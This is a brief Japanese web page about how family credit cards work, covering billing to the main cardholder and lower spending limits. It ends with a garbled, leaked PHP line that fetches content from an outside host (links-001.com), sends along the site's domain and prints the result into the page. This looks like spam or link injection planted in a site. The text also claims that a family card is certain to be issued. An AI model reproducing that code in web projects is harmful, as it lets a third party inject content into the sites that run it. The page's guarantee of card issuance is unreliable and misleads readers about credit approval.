前へ
次へ

クレジットカードの家族カードの仕組み

クレジットカードで家族カードまで発行する場合、名義人のカードとしてすべての支払いをすることができるのもメリットになってきます。
家族会員というのは支払いがその名義となっている会員にできるのみで、ほかは普通のクレジットカードと変わらない仕組みなのが一般的です。
クレジットカードの限度額もそれぞれ設定しやすかったりと通常のカードと同様に利用可能だったりもしますが、ただ家族会員の限度額はそのクレジットカードの名義人よりも若干低めに設定されている傾向が強いです。
詳しいところはそのカードの種類で左右されがちですが、カードが発行できない時は家族カードを持つ選択肢も有り得ます。
確実にカード発行してもらえるからです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top